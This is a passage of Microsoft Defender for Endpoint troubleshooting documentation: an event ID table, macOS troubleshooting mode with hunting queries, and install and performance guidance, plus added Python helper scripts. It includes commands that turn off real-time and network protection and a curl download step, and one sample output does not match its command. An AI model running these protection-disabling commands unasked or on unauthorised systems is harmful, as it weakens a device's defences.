57 Capturing a An investigation package, also Normal operating notification; no action required.


snapshot of the known as forensics package,
machine for is being collected.
troubleshooting
purposes.

59 Starting Starting response command Normal operating notification; no action required.


command: %1 execution.

60 Failed to run Failed to execute response If this error persists, contact Support.
command %1, command.
error: %2.

61 Data collection Failed to read or parse the If this error persists, contact Support.
command data collection command
parameters are arguments (invalid
invalid: SasUri: arguments).
%1,
compressionLevel:
%2.

62 Failed to start Connected User Experiences Look for more troubleshooting hints in the event log:
Connected User and Telemetry (diagtrack) Microsoft-Windows-UniversalTelemetryClient/Operational.
Experiences and service failed to start. Non-
Telemetry service. Microsoft Defender for
Failure code: %1 Endpoint telemetry isn't sent
from this machine.

63 Updating the start Updated start type of the Normal operating notification; no action required.
type of external external service.
service. Name:
%1, actual start
type: %2,
expected start
type: %3, exit
code: %4

64 Starting stopped Starting an external service. Normal operating notification; no action required.
external service.
Name: %1, exit
code: %2

65 Failed to load Failed to load MsSecFlt.sys Reboot the device. If this error persists, contact Support.
Microsoft Security filesystem minifilter.
Events
Component
Minifilter driver.
Failure code: %1

66 Policy update: The C&C connection Normal operating notification; no action required.
Latency mode - frequency policy was updated.
%1

68 The start type of Unexpected external service Fix the external service start type.
the service is start type.
Event Message Description Action
ID

unexpected.
Service name: %1,
actual start type:
%2, expected
start type: %3

69 The service is The external service is Start the external service.


stopped. Service stopped.
name: %1

70 Policy update: The sample collection policy Normal operating notification; no action required.
Allow sample was updated.
collection - %1

71 Succeeded to run The command was executed Normal operating notification; no action required.
command: %1 successfully.

72 Tried to send first Informational only. Normal operating notification; no action required.
full machine
profile report.
Result code: %1

73 Sense starting for Informational only. Normal operating notification; no action required.
platform: %1

74 Device tag in The device tag exceeds the Use a shorter device tag.
registry exceeds length limit.
length limit. Tag
name: %2. Length
limit: %1.

81 Failed to create Failed to create the ETW Reboot the device. If this error persists, contact Support.
Microsoft session.
Defender for
Endpoint ETW
autologger.
Failure code: %1

82 Failed to remove Failed to delete the ETW Contact Support.


Microsoft session.
Defender for
Endpoint ETW
autologger.
Failure code: %1

84 Set Microsoft Set defender running mode Normal operating notification; no action required.
Defender (active or passive).
Antivirus running
mode. Force
passive mode:
%1, result code:
%2.

85 Failed to trigger Starring SenseIR executable Reboot the device. If this error persists, contact Support.
Microsoft failed.
Defender for
Event Message Description Action
ID

Endpoint
executable.
Failure code: %1

86 Starting again Starting the external service Normal operating notification; no action required.
stopped external again.
service that
should be up.
Name: %1, exit
code: %2

87 Cannot start the Failed to start the external Contact Support.


external service. service.
Name: %1

88 Updating the start Updated the start type of the Normal operating notification; no action required.
type of external external service.
service again.
Name: %1, actual
start type: %2,
expected start
type: %3, exit
code: %4

89 Cannot update Can't update the start type of Contact Support.


the start type of the external service.
external service.
Name: %1, actual
start type: %2,
expected start
type: %3

90 Failed to System Guard Runtime Check the permissions on register path:


configure System Monitor doesn't send "HKLM\Software\Microsoft\Windows\CurrentVersion\Sgrm".
Guard Runtime attestation data to the cloud If no issues spotted, contact Support.
Monitor to service.
connect to cloud
service in geo-
region %1. Failure
code: %2

91 Failed to remove System Guard Runtime Check the permissions on register path:
System Guard Monitor doesn't send "HKLM\Software\Microsoft\Windows\CurrentVersion\Sgrm".
Runtime Monitor attestation data to the cloud If no issues spotted, contact Support.
geo-region service.
information.
Failure code: %1

92 Stopping sending Exceed throttling limit. Normal operating notification; no action required.
sensor cyber data
quota because
data quota is
exceeded. Will
resume sending
once quota
Event Message Description Action
ID

period passes.
State Mask: %1

93 Resuming Resume cyber data Normal operating notification; no action required.


sending sensor submission.
cyber data. State
Mask: %1

94 Microsoft The SenseCE executable has Normal operating notification; no action required.
Defender for started.
Endpoint
executable has
started

95 Microsoft The SenseCE executable has Normal operating notification; no action required.
Defender for ended.
Endpoint
executable has
ended

96 Microsoft The SenseCE executable has Normal operating notification; no action required.
Defender for called MCE initialization.
Endpoint Init has
called. Result
code: %2

97 There are There are network Check the network connectivity.


connectivity connectivity issues that affect
issues to the the DLP classification flow.
Cloud for the DLP
scenario

98 The connectivity The connectivity to the Normal operating notification; no action required.
to the Cloud for network was restored and the
the DLP scenario DLP classification flow can
has been restored continue.

99 Sense has A communication error Check the following events in the event log for further
encountered the occurred. details.
following error
while
communicating
with server: (%1).
Result: (%2)

100 Microsoft The SenseCE executable has Reboot the device. If this error persists, contact Support.
Defender for failed to start.
Endpoint
executable failed
to start. Failure
code: %1

102 Microsoft The SenseNdr executable has Normal operating notification; no action required.
Defender for started.
Endpoint Network
Event Message Description Action
ID

Detection and
Response
executable has
started

103 Microsoft The SenseNdr executable has Normal operating notification; no action required.
Defender for ended.
Endpoint Network
Detection and
Response
executable has
ended

104 Failed to queue Occurs during offboarding. Normal operating notification; no action required.
asynchronous
driver unload.
Failure code: %1.

105 Failed to wait for Occurs during offboarding. Normal operating notification; no action required.
driver unload

106 Microsoft Occurs during startup. Contact support.


Defender for
Endpoint service
failed to start.
Failure code %1 ;
Failed to load
MsSense DLL.
Module.

107 Microsoft Occurs during startup. Contact support.


Defender for
Endpoint service
failed to start.
Failure code %1 ;
Issue with
MsSense DLL
Module.

108 Update phase:%1, Occurs during update. Normal operating notification; no action required.
new platform
version: %2,
message: %3.

109 Update phase:%1 Occurs during update. Contact support.


new platform
version: %2,
failure message:
%3, error: %4.

110 Failed to remove Occurs during offboarding. Contact support.


MDEContain WFP
filters.
Event Message Description Action
ID

307 Failed to update Occurs during onboarding. Contact support.


driver permissions
Failure code: %1.

308 Failed to ACL on Occurs during onboarding. Contact support.


Folder %1 Failure
code: %2.

401 Microsoft Failed to create crypto key. If machine isn't reporting, contact support. Otherwise, no
Defender for action required.
Endpoint service
failed to generate
key. Failure code:
%1.

402 Microsoft Failed to persist If a device isn't reporting, contact support. Otherwise, no
Defender for authentication state. action required.
Endpoint service
failed to persist
authentication
state. Failure
code: %1.

403 Registration of Successful registration to Normal operating notification; no action required.


Microsoft authentication service.
Defender for
Endpoint service
completed.

404 Microsoft Successful crypto key Normal operating notification; no action required.
Defender for generation.
Endpoint service
successfully
generated a key.

405 Failed to Failed to send request to Normal operating notification; no action required.
communicate authentication service.
with
authentication
service. %1
request failed,
hresult: %2, HTTP
error code: %3.

406 Request for %1 Request returned undesired Normal operating notification; no action required.
rejected by response.
authentication
service. Hresult:
%2, error code:
%3.

407 Microsoft Failed to sign request. Normal operating notification; no action required.
Defender for
Endpoint service
failed to sign
Event Message Description Action
ID

message
(authentication).
Failure code: %1.

408 Microsoft Failed to persist If a device isn't reporting, contact support. Otherwise, no
Defender for authentication state. action required.
Endpoint service
failed to remove
persist
authentication
state. State: %1,
Failure code: %2.

409 Microsoft Failed to open crypto key. If a device isn't reporting, contact support. Otherwise, no
Defender for action required.
Endpoint service
failed to open
key. Failure code:
%1.

410 Registration is Occurs during reonboarding. Normal operating notification; no action required.
required as part
of reonboarding
of Microsoft
Defender for
Endpoint service.

411 Cyber telemetry Cyber upload temporarily Normal operating notification; no action required.
upload has been suspended.
suspended for
Microsoft
Defender for
Endpoint service
due to
invalid/expired
token.

412 Cyber telemetry Cyber upload successfully Normal operating notification; no action required.
upload been resumed.
resumed for
Microsoft
Defender for
Endpoint service
due to newly
refreshed token.

1800 CSP: Get An operation of Get is about Contact support.


Node&apos;s to start.
Value. NodeId:
(%1), TokenName:
(%2).

1801 CSP: Failed to Get An operation of Get has Contact support.


Node&apos;s failed.
Value. NodeId:
Event Message Description Action
ID

(%1), TokenName:
(%2), Result: (%3).

1802 CSP: Get An operation of Get has Contact support.


Node&apos;s succeeded.
Value complete.
NodeId: (%1),
TokenName: (%2),
Result: (%3).

1803 CSP: Get Last Last time the device Normal operating notification; no action required.
Connected value communicated with CNC.
complete. Result
(%1), IsDefault:
(%2).

1804 CSP: Get Org ID The org ID device get during Normal operating notification; no action required.
value complete. onboarding.
Result: (%1),
IsDefault: (%2).

1805 CSP: Get Sense Is Sense running message after Normal operating notification; no action required.
Running value onboarding.
complete. Result:
(%1).

1806 CSP: Get Get is Sense onboarded. Normal operating notification; no action required.
Onboarding State
value complete.
Result: (%1),
IsDefault: (%2).

1807 CSP: Get Get is Sense onboarded and Normal operating notification; no action required.
Onboarding value onboarding blob hash.
complete.
Onboarding Blob
Hash: (%1),
IsDefault: (%2),
Onboarding State:
(%3), Onboarding
State IsDefault:
(%4).

1808 CSP: Get Get offboarding blob hash. Normal operating notification; no action required.
Offboarding value
complete.
Offboarding Blob
Hash: (%1),
IsDefault: (%2).

1809 CSP: Get Sample Get is sample upload is Normal operating notification; no action required.
Sharing value allowed.
complete. Result:
(%1), IsDefault:
(%2).
Event Message Description Action
ID

1810 CSP: Onboarding Started onboarding flow. Normal operating notification; no action required.
process. Started.

1811 CSP: Onboarding Deleted offboarding blob as Normal operating notification; no action required.
process. Delete part of onboarding flow.
Offboarding blob
complete. Result:
(%1).

1812 CSP: Onboarding Wrote onboarding blob to Normal operating notification; no action required.
process. Write registry as part of onboarding
Onboarding blob flow.
complete. Result:
(%1).

1813 CSP: Onboarding Started Sense service as part Normal operating notification; no action required.
process. The of onboarding flow.
service started
successfully.

1814 CSP: Onboarding Finished waiting for Sense to Normal operating notification; no action required.
process. Pending start as part of onboarding
service running flow.
state complete.
Result: (%1).

1815 CSP: Set Sample Set sample sharing value. Normal operating notification; no action required.
Sharing value
complete.
Previous Value:
(%1), IsDefault:
(%2), New Value:
(%3), Result: (%4).

1816 CSP: Offboarding Deleted onboarding blob as Normal operating notification; no action required.
process. Delete part of offboarding flow.
Onboarding blob
complete. Result
(%1).

1817 CSP: Offboarding Wrote offboarding blob to Normal operating notification; no action required.
process. Write registry as part of offboarding
Offboarding blob flow.
complete. Result
(%1).

1818 CSP: Set An operation of Set is about Normal operating notification; no action required.
Node&apos;s to start.
Value started.
NodeId: (%1),
TokenName: (%2).

1819 CSP: Failed to Set An operation of Set has failed. Contact support.
Node&apos;s
Value. NodeId:
Event Message Description Action
ID

(%1), TokenName:
(%2), Result: (%3).

1820 CSP: Set An operation of Set has Normal operating notification; no action required.
Node&apos;s succeeded.
Value complete.
NodeId: (%1),
TokenName: (%2),
Result: (%3).

1821 CSP: Set Start setting the value of Normal operating notification; no action required.
Telemetry TelemetryReportingFrequency.
Reporting
Frequency
started. New
value: (%1).

1822 CSP: Set Finish setting the value of Normal operating notification; no action required.
Telemetry TelemetryReportingFrequency.
Reporting
Frequency
complete.
Previous value:
(%1), IsDefault:
(%2), New value:
(%3), Result: (%4).

1823 CSP: Get Gets the value of Normal operating notification; no action required.
Telemetry TelemetryReportingFrequency.
Reporting
Frequency
complete. Value:
(%1), Registry
Value: (%2),
IsDefault: (%3).

1824 CSP: Get Group Got groupIds from registry. Normal operating notification; no action required.
Ids complete.
Value: (%1),
IsDefault: (%2).

1825 CSP: Set Group Failed to set groupIds due to Normal operating notification; no action required.
Ids exceeded length.
allowed limit.
Allowed: (%1),
Actual: (%2).

1826 CSP: Set Group Set groupIds. Normal operating notification; no action required.
Ids complete.
Value: (%1),
Result: (%2).

1827 CSP: Onboarding Trace values as part of Normal operating notification; no action required.
process. Service is onboarding.
running: (%1),
Event Message Description Action
ID

Previous
Onboarding Blob
Hash: (%2),
IsDefault: (%3),
Onboarding State:
(%4), Onboarding
State IsDefault:
(%5), New
Onboarding Blob
Hash: (%6).

1828 CSP: Onboarding Trace values as part of Normal operating notification; no action required.
process. Service is offboarding.
running: (%1),
Previous
Offboarding Blob
Hash: (%2),
IsDefault: (%3),
Onboarding State:
(%4), Onboarding
State IsDefault:
(%5), New
Offboarding Blob
Hash: (%6).

1829 CSP: Failed to Set Invalid value for Contact support.


Sample Sharing SampleSharing operation.
Value. Requested
Value: (%1),
Allowed Values
between (%2) and
(%3).

1830 CSP: Failed to Set Setting the value of Contact support if problem persists.
Telemetry TelemetryReportingFrequency
Reporting failed.
Frequency Value.
Requested Value:
(%1).

1831 CSP: Get Sense is Get SenseIsRunning result. Normal operating notification; no action required.
running. Service is
configured as
delay-start, and
hasn&apos;t
started yet.

1832 CSP: Get Device Get DeviceTagging Group Normal operating notification; no action required.
Tagging Group from registry completed.
complete. Value:
(%1), IsDefault:
(%2).

1833 CSP: Get Device Get DeviceTagging Criticality Normal operating notification; no action required.
Tagging Criticality from registry completed.
value complete. In
Event Message Description Action
Registry: (%1),
ID
IsDefault: (%2),
Conversion
Succeeded: (%3),
Result: (%4).

1834 CSP: Get Device Get DeviceTagging Id Method Normal operating notification; no action required.
Tagging from registry completed.
Identification
Method value
complete. In
Registry: (%1),
IsDefault: (%2),
Conversion
Succeeded: (%3),
Result: (%4).

1835 CSP: Set Device Set DeviceTagging Group in Normal operating notification; no action required.
Tagging Group registry completed.
complete. Value:
(%1), Result: (%2).

1836 CSP: Set Device Set DeviceTagging Group Contact support if problem persists.
Tagging Group failed as maximum Length
exceeded allowed Limit exceeded.
limit. Allowed:
(%1), Actual: (%2).

1837 CSP: Set Device Set DeviceTagging Criticality Normal operating notification; no action required.
Tagging Criticality in registry completed.
value complete.
Previous Value:
(%1), IsDefault:
(%2), New Value:
(%3), Result: (%4).

1838 CSP: Failed to Set Set DeviceTagging Criticality Contact support if problem persists.
Device Tagging failed as value was not within
Criticality Value. expected range.
Requested Value:
(%1), Allowed
Values between
(%2) and (%3).

1839 CSP: Set Device Set DeviceTagging Id Method Normal operating notification; no action required.
Tagging in registry completed.
Identification
Method value
complete.
Previous Value:
(%1), IsDefault:
(%2), New Value:
(%3), Result: (%4).

1840 CSP: Failed to Set Set DeviceTagging Id Method Contact support if problem persists.
Device Tagging failed as value was not within
Identification expected range.
Method Value.
Event Message Description Action
Requested Value:
ID
(%1), Allowed
Values between
(%2) and (%3).

View Defender for Endpoint events in the System event log

Microsoft Defender for Endpoint events also appear in the System event log.

To open the System event log:

1. Select Start on the Windows menu, type Event Viewer, and press Enter to open the Event Viewer.
2. In the log list, under Log Summary, scroll until you see System. Double-click the item to open the log.

You can use this table for more information on the Defender for Endpoint events in the System event log and to determine further troubleshooting steps.

| Event ID | Message | Description | Action |
| --- | --- | --- | --- |
| 1 | The backing-file for the real-time session "SenseNdrPktmon" has reached its maximum size. As a result, new events will not be logged to this session until space becomes available. | This real-time session between Pktmon (the built-in Windows service that captures network traffic) and the SenseNDR agent, which analyzes the packets asynchronously, is size-limited to prevent performance issues. The event can therefore appear when too many packets are intercepted in a short period, causing some packets to be skipped. It is more common on devices with high network traffic. | Normal operating notification; no action required. |

See also
Onboard Windows client devices
Configure device proxy and Internet connectivity settings
Troubleshoot Microsoft Defender for Endpoint
Client analyzer overview
Download and run the client analyzer
Understand the analyzer HTML report


Troubleshooting mode in Microsoft
Defender for Endpoint on macOS
Article • 02/12/2024

Applies to:

- Microsoft Defender XDR
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint on macOS
Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Important

Some information relates to a pre-released product feature in public preview which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

This article describes how to enable troubleshooting mode in Microsoft Defender for Endpoint on macOS so admins can troubleshoot various Microsoft Defender Antivirus features temporarily, even if organizational policies manage the devices.

For example, if tamper protection is enabled, certain settings can't be modified or turned off, but you can use troubleshooting mode on the device to edit those settings temporarily.

Troubleshooting mode is disabled by default, and requires you to turn it on for a device (and/or group of devices) for a limited time. Troubleshooting mode is an enterprise-only feature, and requires access to the Microsoft Defender XDR portal.

What do you need to know before you begin

During troubleshooting mode, you can:

- Use Microsoft Defender for Endpoint on macOS for functional troubleshooting and application compatibility (false positives).
- As a local admin with appropriate permissions, change the following policy-locked configurations on individual endpoints:

| Setting | Enable | Disable/Remove |
| --- | --- | --- |
| Real-Time Protection / Passive mode / On-Demand | mdatp config real-time-protection --value enabled | mdatp config real-time-protection --value disabled |
| Network Protection | mdatp config network-protection enforcement-level --value block | mdatp config network-protection enforcement-level --value disabled |
| realTimeProtectionStatistics | mdatp config real-time-protection-statistics --value enabled | mdatp config real-time-protection-statistics --value disabled |
| tags | mdatp edr tag set --name GROUP --value [name] | mdatp edr tag remove --tag-name [name] |
| groupIds | mdatp edr group-ids --group-id [group] | |
| Endpoint DLP | mdatp config data_loss_prevention --value enabled | mdatp config data_loss_prevention --value disabled |

During troubleshooting mode, you can't:

- Disable tamper protection for Microsoft Defender for Endpoint on macOS.
- Uninstall Microsoft Defender for Endpoint on macOS.

Prerequisites

Note

Troubleshooting mode on macOS is currently in public preview. Review the prerequisites carefully.

- A supported version of macOS for Microsoft Defender for Endpoint.
- Microsoft Defender for Endpoint must be tenant-enrolled and active on the device.
- Permissions for "Manage security settings in Security Center" in Microsoft Defender for Endpoint.
- Platform Update version 101.23122.0005 or newer.
- Beta Channel (formerly Insiders-Fast), or Current Channel (Preview) (formerly Insiders-Slow).
Enable troubleshooting mode on macOS

1. Go to the Microsoft Defender XDR portal, and sign in.

2. Navigate to the device page of the device you want to turn troubleshooting mode on for. Then, select the ellipses (...) and select Turn on troubleshooting mode.

   Note

   The Turn on troubleshooting mode option is available on all devices, even if the device does not meet the prerequisites for troubleshooting mode.

3. Read the information displayed on the pane and, once you're ready, select Submit to confirm that you want to turn on troubleshooting mode for that device.

4. You'll see the text "It might take a few minutes for the change to take effect". During this time, when you select the ellipses again, the Turn on troubleshooting mode option shows as pending and is grayed out.

5. Once complete, the device page shows that the device is now in troubleshooting mode.

   If the end user is logged in on the macOS device, they'll see the following text:

   Troubleshooting mode has started. This mode allows you to temporarily change settings that are managed by your Administrator. Expires at YEAR-MM-DDTHH:MM:SSZ.

   Select OK.

6. Once enabled, you can test the different command line options that can be toggled in troubleshooting mode (TS mode).

   For example, when you run mdatp config real-time-protection --value disabled to disable real-time protection, you're prompted for your password. Select OK after entering your password.

   Running mdatp health afterwards reports real_time_protection_enabled as "false" while tamper_protection remains "block".
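The last step is worth scripting when you toggle several settings on a device: you want to see that each change took effect and, just as important, that tamper_protection is still "block", since troubleshooting mode relaxes individual settings but not the guard itself. The following script is an added example, not Microsoft code. It reads mdatp health in JSON form (mdatp health --output json) when the binary is present and otherwise uses a constructed sample; the keys healthy, real_time_protection_enabled and tamper_protection come from the page, while the flat key/value shape of the JSON and the string value "block" are assumptions.

```python
"""Verify a macOS device's troubleshooting-mode state from `mdatp health`.

Added example, not Microsoft code.  ASSUMPTION: `mdatp health --output json`
returns a flat JSON object whose keys match the names shown by `mdatp health`.
"""
import json
import shutil
import subprocess


def read_health():
    """Return the mdatp health dictionary, or None if mdatp isn't available."""
    if shutil.which("mdatp") is None:
        return None
    proc = subprocess.run(["mdatp", "health", "--output", "json"],
                          capture_output=True, text=True)
    if proc.returncode != 0:
        return None
    return json.loads(proc.stdout)


def verify_troubleshooting_state(health, expected):
    """Compare the settings you toggled (expected: key -> value) with the
    health report.  Returns (ok, problems).  Tamper protection must still
    read "block": if it doesn't, the device is not merely in troubleshooting
    mode but has lost its guard, which is a separate problem to chase."""
    problems = []
    if str(health.get("tamper_protection", "")).lower() != "block":
        problems.append("tamper_protection is not 'block'")
    for key, want in expected.items():
        got = health.get(key)
        if got != want:
            problems.append(f"{key}: expected {want!r}, got {got!r}")
    return (not problems, problems)


# Constructed sample: what the health report could look like right after
# `mdatp config real-time-protection --value disabled` in troubleshooting mode.
SAMPLE_HEALTH = {
    "healthy": True,
    "real_time_protection_enabled": False,
    "tamper_protection": "block",
}

if __name__ == "__main__":
    health = read_health() or SAMPLE_HEALTH
    ok, problems = verify_troubleshooting_state(
        health, {"real_time_protection_enabled": False})
    print("OK: settings applied, tamper protection still enforced" if ok
          else "\n".join(problems))
```

Pass the same key/value pairs you changed with mdatp config as the expected dictionary; anything that did not take effect, and any loss of tamper protection, is listed by name.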

Advanced hunting queries for detection

There are some prebuilt advanced hunting queries to give you visibility into the troubleshooting events that are occurring in your environment. You can use these queries to create detection rules to generate alerts when devices are in troubleshooting mode.

Get troubleshooting events for a particular device

You can use the following query to search by deviceId or deviceName by commenting out the respective lines.

Kusto

//let deviceName = "<deviceName>"; // update with device name
let deviceId = "<deviceID>"; // update with device id
DeviceEvents
| where DeviceId == deviceId
//| where DeviceName == deviceName
| where ActionType == "AntivirusTroubleshootModeEvent"
| extend _tsmodeproperties = parse_json(AdditionalFields)
| project Timestamp, DeviceId, DeviceName, _tsmodeproperties,
    _tsmodeproperties.TroubleshootingState,
    _tsmodeproperties.TroubleshootingPreviousState,
    _tsmodeproperties.TroubleshootingStartTime,
    _tsmodeproperties.TroubleshootingStateExpiry,
    _tsmodeproperties.TroubleshootingStateRemainingMinutes,
    _tsmodeproperties.TroubleshootingStateChangeReason,
    _tsmodeproperties.TroubleshootingStateChangeSource

Devices currently in troubleshooting mode

You can find the devices that are currently in troubleshooting mode using the following query:

Kusto

DeviceEvents
| where Timestamp > ago(4h) // troubleshooting mode automatically disables after 4 hours
| where ActionType == "AntivirusTroubleshootModeEvent"
| extend _tsmodeproperties = parse_json(AdditionalFields)
| where _tsmodeproperties.TroubleshootingStateChangeReason contains "started"
| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by DeviceId
| order by Timestamp desc

Count of troubleshooting mode instances by device

You can find the number of troubleshooting mode instances for a device using the following query:

Kusto

DeviceEvents
| where ActionType == "AntivirusTroubleshootModeEvent"
| extend _tsmodeproperties = parse_json(AdditionalFields)
| where Timestamp > ago(30d) // choose the date range you want
| where _tsmodeproperties.TroubleshootingStateChangeReason contains "started"
| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by DeviceId
| sort by count_

Total count

You can get the total count of troubleshooting mode instances using the following query:

Kusto

DeviceEvents
| where ActionType == "AntivirusTroubleshootModeEvent"
| extend _tsmodeproperties = parse_json(AdditionalFields)
| where Timestamp > ago(2d) // beginning of time range
| where Timestamp < ago(1d) // end of time range
| where _tsmodeproperties.TroubleshootingStateChangeReason contains "started"
| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count()
| where count_ > 5 // choose your max number of TS mode instances for your time range



Troubleshoot installation issues for
Microsoft Defender for Endpoint on
macOS
Article • 11/15/2023

Applies to:

- Microsoft Defender for Endpoint on macOS
- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Installation failed
For manual installation, the Summary page of the installation wizard says, "An error
occurred during installation. The Installer encountered an error that caused the
installation to fail. Contact the software publisher for assistance." For MDM
deployments, it displays as a generic installation failure as well.

While we don't display an exact error to the end user, we keep a log file with installation
progress in /Library/Logs/Microsoft/mdatp/install.log . Each installation session
appends to this log file. You can use sed to output the last installation session only:

Bash

sed -n 'H; /^preinstall com.microsoft.wdav begin/h; ${g;p;}' /Library/Logs/Microsoft/mdatp/install.log

Output

preinstall com.microsoft.wdav begin [2020-03-11 13:08:49 -0700] 804
INSTALLER_SECURE_TEMP=/Library/InstallerSandboxes/.PKInstallSandboxManager/CB509765-70FC-4679-866D-8A14AD3F13CC.activeSandbox/89FA879B-971B-42BF-B4EA-7F5BB7CB5695
correlation id=CB509765-70FC-4679-866D-8A14AD3F13CC
[ERROR] Downgrade from 100.88.54 to 100.87.80 is not permitted
preinstall com.microsoft.wdav end [2020-03-11 13:08:49 -0700] 804 => 1

In this example, the actual reason is prefixed with [ERROR]. The installation failed
because a downgrade between these versions isn't supported.
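The same extraction can be scripted when you need to triage install logs from many devices rather than eyeball one. The following Python is an added example, not part of Microsoft's documentation or the mdatp tooling: it splits the log into installation sessions on the same "preinstall com.microsoft.wdav begin" marker the sed command uses, takes the last session, and pulls out its exit code and [ERROR] lines. The log text is constructed from the format shown above (the first session and its correlation id are invented); on a real device you would read /Library/Logs/Microsoft/mdatp/install.log instead.

```python
"""Extract the last installation session from a Defender for Endpoint
install.log and surface its [ERROR] reason.

Added example, not Microsoft's code. The log text below is constructed from
the format shown in the article; read
/Library/Logs/Microsoft/mdatp/install.log on a real device.
"""
import re
from typing import Dict, List, Optional

SESSION_BEGIN = "preinstall com.microsoft.wdav begin"
END_RE = re.compile(r"\bend \[.*\] \d+ => (\d+)$")

# Constructed sample: two appended sessions, the second one failed.
# The first session (and its correlation id) is invented for the example.
SAMPLE_LOG = """preinstall com.microsoft.wdav begin [2020-03-10 09:00:00 -0700] 512
correlation id=11111111-1111-1111-1111-111111111111
preinstall com.microsoft.wdav end [2020-03-10 09:00:02 -0700] 512 => 0
preinstall com.microsoft.wdav begin [2020-03-11 13:08:49 -0700] 804
INSTALLER_SECURE_TEMP=/Library/InstallerSandboxes/.PKInstallSandboxManager/CB509765-70FC-4679-866D-8A14AD3F13CC.activeSandbox/89FA879B-971B-42BF-B4EA-7F5BB7CB5695
correlation id=CB509765-70FC-4679-866D-8A14AD3F13CC
[ERROR] Downgrade from 100.88.54 to 100.87.80 is not permitted
preinstall com.microsoft.wdav end [2020-03-11 13:08:49 -0700] 804 => 1
"""


def split_sessions(log_text: str) -> List[List[str]]:
    """Split the log into sessions; each 'begin' marker starts a new one.
    Lines before the first marker (none in a well-formed log) are dropped."""
    sessions: List[List[str]] = []
    for line in log_text.splitlines():
        if line.startswith(SESSION_BEGIN):
            sessions.append([])
        if sessions:
            sessions[-1].append(line)
    return sessions


def last_session(log_text: str) -> List[str]:
    """The session the sed one-liner prints: the most recent one."""
    sessions = split_sessions(log_text)
    return sessions[-1] if sessions else []


def exit_code(session: List[str]) -> Optional[int]:
    """Return the '=> N' code from the session's end line, or None if the
    session never reached its end line (installer killed, log truncated)."""
    for line in reversed(session):
        match = END_RE.search(line)
        if match:
            return int(match.group(1))
    return None


def error_reasons(session: List[str]) -> List[str]:
    """All [ERROR]-prefixed lines, with the prefix stripped."""
    prefix = "[ERROR] "
    return [line[len(prefix):] for line in session if line.startswith(prefix)]


def summarize(log_text: str) -> Dict[str, object]:
    """One-record triage summary for the most recent installation attempt."""
    session = last_session(log_text)
    return {
        "lines": len(session),
        "exit_code": exit_code(session),
        "errors": error_reasons(session),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

A non-zero exit code with an empty error list, or a missing end line, is worth flagging separately in bulk triage: the first means the installer failed without an [ERROR] line, the second that the session never completed, and both point you at the macOS installer logs described in the next section rather than at this file.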

MDATP install log missing or not updated

In rare cases, installation leaves no trace in MDATP's
/Library/Logs/Microsoft/mdatp/install.log file. First, verify that an installation happened.
Then analyze possible errors by querying macOS logs. It's helpful to do this in MDM
deployments, when there's no client UI. We recommend that you use a narrow time
window to run a query and filter by the logging process name, as there will be a huge
amount of information.

Bash

grep '^2020-03-11 13:08' /var/log/install.log

Bash

log show --start '2020-03-11 13:00:00' --end '2020-03-11 13:08:50' --info --debug --source --predicate 'processImagePath CONTAINS[C] "install"' --style syslog


Troubleshoot performance issues for
Microsoft Defender for Endpoint on
macOS
Article • 03/08/2023

Applies to:

Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

This topic provides some general steps that can be used to narrow down performance
issues related to Microsoft Defender for Endpoint on macOS.

Depending on the applications that you're running and your device characteristics, you
may experience suboptimal performance when running Microsoft Defender for Endpoint
on macOS. In particular, applications or system processes that access many resources
over a short timespan can lead to performance issues in Microsoft Defender for
Endpoint on macOS.

Warning

Before starting, please make sure that other security products are not currently
running on the device. Multiple security products may conflict and impact the host
performance.

Troubleshoot performance issues using Real-time Protection Statistics

Applies to:

Only performance issues related to AV

Real-time protection (RTP) is a feature of Defender for Endpoint on macOS that
continuously monitors and protects your device against threats. It consists of file and
process monitoring and other heuristics.

The following steps can be used to troubleshoot and mitigate these issues:

1. Disable real-time protection using one of the following methods and observe
whether the performance improves. This approach helps narrow down whether
Microsoft Defender for Endpoint on macOS is contributing to the performance
issues.

If your device is not managed by your organization, real-time protection can be
disabled using one of the following options:

From the user interface. Open Microsoft Defender for Endpoint on macOS
and navigate to Manage settings.

From the Terminal. For security purposes, this operation requires elevation.

Bash

mdatp config real-time-protection --value disabled

If your device is managed by your organization, real-time protection can be
disabled by your administrator using the instructions in Set preferences for
Microsoft Defender for Endpoint on macOS.

If the performance problem persists while real-time protection is off, the
origin of the problem could be the endpoint detection and response
component. In this case, please contact customer support for further
instructions and mitigation.

2. Open Finder and navigate to Applications > Utilities. Open Activity Monitor and
analyze which applications are using the resources on your system. Typical
examples include software updaters and compilers.

3. To find the applications that are triggering the most scans, you can use real-time
statistics gathered by Defender for Endpoint on Mac.

Note

This feature is available in version 100.90.70 or newer. This feature is enabled
by default on the Dogfood and InsiderFast channels. If you're using a
different update channel, this feature can be enabled from the command line:

Bash

mdatp config real-time-protection-statistics --value enabled

This feature requires real-time protection to be enabled. To check the status of
real-time protection, run the following command:

Bash

mdatp health --field real_time_protection_enabled

Verify that the real_time_protection_enabled entry is true. Otherwise, run the
following command to enable it:

Bash

mdatp config real-time-protection --value enabled

Output

Configuration property updated

To collect current statistics, run:

Bash

mdatp diagnostic real-time-protection-statistics --output json > real_time_protection.json

Note

Using --output json (note the double dash) ensures that the output format is
ready for parsing. The output of this command will show all processes and
their associated scan activity.

4. On your Mac system, download the sample Python parser high_cpu_parser.py
using the command:

Bash

curl -O https://raw.githubusercontent.com/microsoft/mdatp-
xplat/master/linux/diagnostic/high_cpu_parser.py

The output of this command should be similar to the following:

Output

--2020-11-14 11:27:27-- https://raw.githubusercontent.com/microsoft.mdatp-xplat/master/linus/diagnostic/high_cpu_parser.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.xxx.xxx
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.xxx.xxx| :443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1020 [text/plain]
Saving to: 'high_cpu_parser.py'
